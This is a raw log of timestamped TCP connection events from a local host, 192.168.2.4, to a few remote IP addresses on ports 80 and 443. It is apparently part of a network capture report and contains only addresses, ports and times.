Jan 13, 2025 12:08:10.940721035 CET	49730	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:11.368647099 CET	443	49735	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:11.372059107 CET	49735	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:11.372102022 CET	443	49735	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:11.496090889 CET	443	49735	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:11.496225119 CET	443	49735	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:11.496283054 CET	49735	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:11.496674061 CET	49735	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:11.499994040 CET	49730	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:11.501205921 CET	49736	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:11.506786108 CET	80	49730	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:11.506901026 CET	49730	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:11.507822037 CET	80	49736	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:11.507967949 CET	49736	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:11.508167028 CET	49736	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:11.514678955 CET	80	49736	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:12.349210024 CET	80	49736	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:12.350579977 CET	49738	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:12.350662947 CET	443	49738	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:12.350735903 CET	49738	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:12.350986958 CET	49738	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:12.351022959 CET	443	49738	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:12.393944025 CET	49736	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:12.813863993 CET	443	49738	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:12.815507889 CET	49738	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:12.815588951 CET	443	49738	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:12.958123922 CET	443	49738	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:12.958194017 CET	443	49738	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:12.958256006 CET	49738	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:12.958679914 CET	49738	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:12.963042021 CET	49740	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:12.967843056 CET	80	49740	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:12.967904091 CET	49740	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:12.967997074 CET	49740	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:12.972742081 CET	80	49740	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:14.801299095 CET	80	49740	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:14.802397013 CET	49741	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:14.802448034 CET	443	49741	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:14.802525043 CET	49741	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:14.802759886 CET	49741	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:14.802774906 CET	443	49741	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:14.846950054 CET	49740	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:15.277060986 CET	443	49741	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:15.278623104 CET	49741	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:15.278656960 CET	443	49741	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:15.430429935 CET	443	49741	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:15.430571079 CET	443	49741	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:15.430701971 CET	49741	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:15.430880070 CET	49741	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:15.433820963 CET	49740	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:15.434788942 CET	49742	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:15.438911915 CET	80	49740	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:15.438992023 CET	49740	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:15.439589024 CET	80	49742	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:15.439645052 CET	49742	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:15.439703941 CET	49742	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:15.444555998 CET	80	49742	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:16.284544945 CET	80	49742	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:16.285963058 CET	49743	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:16.286009073 CET	443	49743	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:16.286096096 CET	49743	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:16.286330938 CET	49743	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:16.286345959 CET	443	49743	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:16.331324100 CET	49742	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:16.745031118 CET	443	49743	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:16.746654034 CET	49743	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:16.746701002 CET	443	49743	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:16.900994062 CET	443	49743	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:16.901174068 CET	443	49743	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:16.901245117 CET	49743	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:16.901720047 CET	49743	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:17.056837082 CET	49742	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:17.057882071 CET	49744	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:17.062247038 CET	80	49742	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:17.062310934 CET	49742	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:17.062824965 CET	80	49744	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:17.062886000 CET	49744	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:17.065684080 CET	49744	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:17.070588112 CET	80	49744	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:17.875715017 CET	80	49744	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:17.877042055 CET	49745	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:17.877144098 CET	443	49745	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:17.877232075 CET	49745	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:17.877471924 CET	49745	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:17.877510071 CET	443	49745	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:17.925065041 CET	49744	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:18.357764006 CET	443	49745	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:18.359247923 CET	49745	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:18.359350920 CET	443	49745	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:18.493161917 CET	443	49745	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:18.493310928 CET	443	49745	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:18.493379116 CET	49745	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:18.493694067 CET	49745	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:18.518208027 CET	49744	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:18.523287058 CET	80	49744	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:18.523372889 CET	49744	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:18.534214020 CET	49746	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:18.539074898 CET	80	49746	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:18.539138079 CET	49746	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:18.539208889 CET	49746	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:18.544054031 CET	80	49746	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:19.367412090 CET	80	49746	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:19.368632078 CET	49747	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:19.368729115 CET	443	49747	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:19.368812084 CET	49747	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:19.369092941 CET	49747	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:19.369139910 CET	443	49747	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:19.409482002 CET	49746	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:19.858620882 CET	443	49747	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:19.861339092 CET	49747	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:19.861378908 CET	443	49747	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:20.011746883 CET	49748	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:20.014956951 CET	443	49747	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:20.015105009 CET	443	49747	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:20.015182018 CET	49747	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:20.015639067 CET	49747	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:20.016690016 CET	80	49748	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:20.016771078 CET	49748	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:20.016923904 CET	49748	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:20.019659996 CET	49746	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:20.020561934 CET	49749	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:20.021719933 CET	80	49748	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:20.024707079 CET	80	49746	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:20.024750948 CET	49746	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:20.025405884 CET	80	49749	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:20.025460005 CET	49749	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:20.025558949 CET	49749	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:20.030384064 CET	80	49749	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:20.832367897 CET	80	49748	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:20.835899115 CET	49748	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:20.840778112 CET	80	49748	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:20.847276926 CET	80	49749	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:20.848386049 CET	49751	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:20.848475933 CET	443	49751	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:20.848551989 CET	49751	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:20.848758936 CET	49751	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:20.848782063 CET	443	49751	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:20.893819094 CET	49749	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:21.128580093 CET	80	49748	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:21.179101944 CET	49752	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:21.179191113 CET	443	49752	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:21.179358006 CET	49752	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:21.182507038 CET	49752	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:21.182545900 CET	443	49752	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:21.253201962 CET	49748	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:21.312356949 CET	443	49751	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:21.313951015 CET	49751	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:21.314030886 CET	443	49751	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:21.448642015 CET	443	49751	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:21.448697090 CET	443	49751	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:21.448749065 CET	49751	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:21.449052095 CET	49751	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:21.451695919 CET	49749	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:21.452516079 CET	49753	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:21.456736088 CET	80	49749	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:21.457006931 CET	49749	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:21.457354069 CET	80	49753	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:21.457425117 CET	49753	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:21.457597017 CET	49753	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:21.462415934 CET	80	49753	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:21.640183926 CET	443	49752	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:21.640273094 CET	49752	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:21.641470909 CET	49752	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:21.641498089 CET	443	49752	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:21.642055988 CET	443	49752	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:21.689512968 CET	49752	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:21.735327959 CET	443	49752	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:21.793621063 CET	443	49752	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:21.793776989 CET	443	49752	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:21.794075966 CET	49752	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:21.827529907 CET	49752	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:21.846529007 CET	49748	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:21.851476908 CET	80	49748	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:22.138021946 CET	80	49748	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:22.253242016 CET	49748	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:22.267527103 CET	49755	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:22.267601967 CET	443	49755	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:22.267683029 CET	49755	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:22.268053055 CET	49755	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:22.268089056 CET	443	49755	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:22.277165890 CET	80	49753	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:22.293931007 CET	49756	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:22.293967962 CET	443	49756	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:22.294064999 CET	49756	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:22.294346094 CET	49756	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:22.294361115 CET	443	49756	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:22.376488924 CET	49753	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:22.722172022 CET	443	49755	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:22.724396944 CET	49755	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:22.724428892 CET	443	49755	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:22.750644922 CET	443	49756	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:22.751955032 CET	49756	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:22.751976013 CET	443	49756	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:22.862832069 CET	443	49755	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:22.862991095 CET	443	49755	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:22.863046885 CET	49755	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:22.863250017 CET	49755	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:22.866003990 CET	49748	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:22.866929054 CET	49759	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:22.871463060 CET	80	49748	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:22.871530056 CET	49748	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:22.871772051 CET	80	49759	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:22.871850014 CET	49759	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:22.871928930 CET	49759	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:22.879247904 CET	80	49759	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:22.885246038 CET	443	49756	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:22.885397911 CET	443	49756	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:22.885456085 CET	49756	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:22.885660887 CET	49756	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:22.900325060 CET	49753	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:22.906996012 CET	80	49753	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:22.907058001 CET	49753	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:22.909344912 CET	49760	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:22.909404993 CET	443	49760	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:22.909468889 CET	49760	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:22.909821987 CET	49760	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:22.909852982 CET	443	49760	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:23.528049946 CET	443	49760	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:23.528131008 CET	49760	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:23.531838894 CET	49760	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:23.531853914 CET	443	49760	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:23.532258987 CET	443	49760	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:23.541254044 CET	49760	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:23.583334923 CET	443	49760	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:23.713212013 CET	80	49759	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:23.714368105 CET	49762	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:23.714426041 CET	443	49762	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:23.714509964 CET	49762	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:23.714745045 CET	49762	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:23.714776993 CET	443	49762	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:23.765480995 CET	443	49760	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:23.765651941 CET	443	49760	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:23.765753984 CET	49760	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:23.770919085 CET	49760	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:23.846956015 CET	49759	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:24.209855080 CET	443	49762	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:24.217921019 CET	49762	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:24.217956066 CET	443	49762	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:24.352015972 CET	443	49762	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:24.352068901 CET	443	49762	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:24.352252007 CET	49762	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:24.352652073 CET	49762	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:24.367738008 CET	49764	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:24.372757912 CET	80	49764	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:24.373241901 CET	49764	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:24.373344898 CET	49764	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:24.378179073 CET	80	49764	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:25.299108028 CET	80	49764	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:25.301067114 CET	49765	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:25.301162004 CET	443	49765	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:25.301505089 CET	49765	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:25.301870108 CET	49765	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:25.301901102 CET	443	49765	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:25.346955061 CET	49764	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:25.777117968 CET	443	49765	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:25.784349918 CET	49765	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:25.784430027 CET	443	49765	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:25.926071882 CET	443	49765	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:25.926207066 CET	443	49765	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:25.926275969 CET	49765	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:25.926456928 CET	49765	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:25.929047108 CET	49764	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:25.930078030 CET	49766	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:25.934115887 CET	80	49764	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:25.934181929 CET	49764	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:25.934983015 CET	80	49766	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:25.935055971 CET	49766	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:25.935116053 CET	49766	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:25.939919949 CET	80	49766	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:26.773801088 CET	80	49766	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:26.777698994 CET	49767	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:26.777786970 CET	443	49767	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:26.778064013 CET	49767	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:26.778064013 CET	49767	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:26.778131962 CET	443	49767	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:26.831490993 CET	49766	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:27.252629995 CET	443	49767	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:27.254318953 CET	49767	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:27.254398108 CET	443	49767	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:27.383820057 CET	443	49767	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:27.383969069 CET	443	49767	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:27.384109020 CET	49767	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:27.384500027 CET	49767	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:27.387729883 CET	49768	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:27.387733936 CET	49766	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:27.392607927 CET	80	49768	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:27.392860889 CET	80	49766	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:27.392899036 CET	49768	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:27.392987013 CET	49768	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:27.393388987 CET	49766	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:27.397816896 CET	80	49768	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:28.213763952 CET	80	49768	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:28.215158939 CET	49769	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:28.215212107 CET	443	49769	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:28.215287924 CET	49769	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:28.215539932 CET	49769	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:28.215553045 CET	443	49769	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:28.268909931 CET	49768	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:28.683873892 CET	443	49769	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:28.736783028 CET	49769	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:28.736838102 CET	443	49769	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:28.842715979 CET	443	49769	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:28.842844963 CET	443	49769	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:28.842914104 CET	49769	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:28.845014095 CET	49769	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:28.956675053 CET	49768	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:28.957412958 CET	49770	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:28.961966038 CET	80	49768	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:28.962025881 CET	49768	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:28.962430954 CET	80	49770	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:28.962491035 CET	49770	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:28.963989973 CET	49770	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:28.968873978 CET	80	49770	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:30.773112059 CET	80	49770	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:30.774223089 CET	49771	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:30.774311066 CET	443	49771	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:30.774403095 CET	49771	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:30.774609089 CET	49771	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:30.774632931 CET	443	49771	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:30.815725088 CET	49770	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:31.234797955 CET	443	49771	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:31.241230965 CET	49771	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:31.241324902 CET	443	49771	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:31.381217003 CET	443	49771	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:31.381382942 CET	443	49771	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:31.381455898 CET	49771	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:31.382033110 CET	49771	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:31.662866116 CET	49770	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:31.664016008 CET	49772	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:31.667944908 CET	80	49770	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:31.667995930 CET	49770	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:31.668855906 CET	80	49772	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:31.668921947 CET	49772	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:31.669025898 CET	49772	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:31.673852921 CET	80	49772	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:31.772635937 CET	49736	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:31.950078964 CET	49773	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:31.950167894 CET	443	49773	149.154.167.220	192.168.2.4
Jan 13, 2025 12:08:31.950256109 CET	49773	443	192.168.2.4	149.154.167.220
Jan 13, 2025 12:08:31.950529099 CET	49773	443	192.168.2.4	149.154.167.220
